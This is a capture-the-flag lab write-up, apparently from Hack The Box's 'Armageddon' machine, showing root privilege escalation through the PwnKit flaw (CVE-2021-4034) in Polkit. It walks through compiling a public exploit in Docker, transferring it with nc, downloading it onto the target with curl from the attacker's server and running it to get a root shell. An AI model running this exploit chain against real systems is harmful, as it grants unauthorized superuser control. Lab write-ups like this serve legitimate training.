InfoSec LAB

Armageddon_Privilege_Escalation_2

Created: 3 min read

CVE-2021-4034

peas discovered that the target system is vulnerable to cve-2021-4034

The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to sudo.

A memory corruption flaw exists when no argument is passed to the function. By manipulating environment variables, an attacker can trick pkexec to load and execute arbitrary code with superuser privileges.

exploit (pwnkit):

I found an exploit online

[brucetherealadmin@armageddon ~]$ gcc
-bash: gcc: command not found
[brucetherealadmin@armageddon ~]$ cc
-bash: cc: command not found

Local compilation is not available. Opting out to remote compilation

Docker Exploit Development

┌──(kali㉿kali)-[~/archive/htb/labs/armageddon]
└─$ docker run -it --entrypoint "/bin/bash" --name armageddon centos:7
unable to find image 'centos:7' locally
7: Pulling from library/centos
2d473b07cdd5: Pull complete 
digest: sha256:be65f488b7764ad3638f236b7b515b3678369a5124c47b8d32916d6487418ea4
status: Downloaded newer image for centos:7
[root@b81e04df58c7 /]# yum update ; yum install -y net-tools netcat nano gcc gcc-multilib make git wget

Setting up the environment

[root@b81e04df58c7 ~]# git clone https://github.com/berdav/CVE-2021-4034 ; cd CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
unpacking objects: 100% (92/92), done.

Downloading the exploit

[root@b81e04df58c7 CVE-2021-4034]# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
make: which: Command not found
mkdir -p GCONV_PATH=.
cp -f  gconv_path=./pwnkit.so:.
cp: missing destination file operand after 'GCONV_PATH=./pwnkit.so:.'
Try 'cp --help' for more information.
make: *** [gconvpath] Error 1

Compilation initially fails because there is no such program, which, that is used by the make file

[root@b81e04df58c7 ~]# yum install which -y

Let’s install which

[root@b81e04df58c7 CVE-2021-4034]# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true gconv_path=./pwnkit.so:.

Compiling works this time

[root@b81e04df58c7 CVE-2021-4034]# cd ../ ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034

Packaging it up for delivery

[root@b81e04df58c7 ~]# nc 172.18.0.1 2222 < CVE-2021-4034.tar.gz 
┌──(kali㉿kali)-[~/archive/htb/labs/armageddon]
└─$ nnc 2222 > CVE-2021-4034.tar.gz
listening on [any] 2222 ...
connect to [172.18.0.1] from (UNKNOWN) [172.17.0.2] 51522

I moved the package out of the Docker container to the host where a web server is running for delivery to the target system

Exploitation

[brucetherealadmin@armageddon ~]$ curl -s http://10.10.14.2/CVE-2021-4034.tar.gz -o CVE-2021-4034.tar.gz ; tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Delivery complete

[brucetherealadmin@armageddon CVE-2021-4034]$ ./cve-2021-4034
sh-4.2# whoami
root
sh-4.2# hostname
armageddon.htb
sh-4.2# ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.233  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::7648:5ea1:5371:b3b5  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::69d1:bb00:780c:f997  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:77:2d  txqueuelen 1000  (Ethernet)
        RX packets 844154  bytes 153226019 (146.1 MiB)
        RX errors 0  dropped 148  overruns 0  frame 0
        TX packets 830041  bytes 303615645 (289.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1448  bytes 146156 (142.7 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1448  bytes 146156 (142.7 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

Interactive Graph View

Backlinks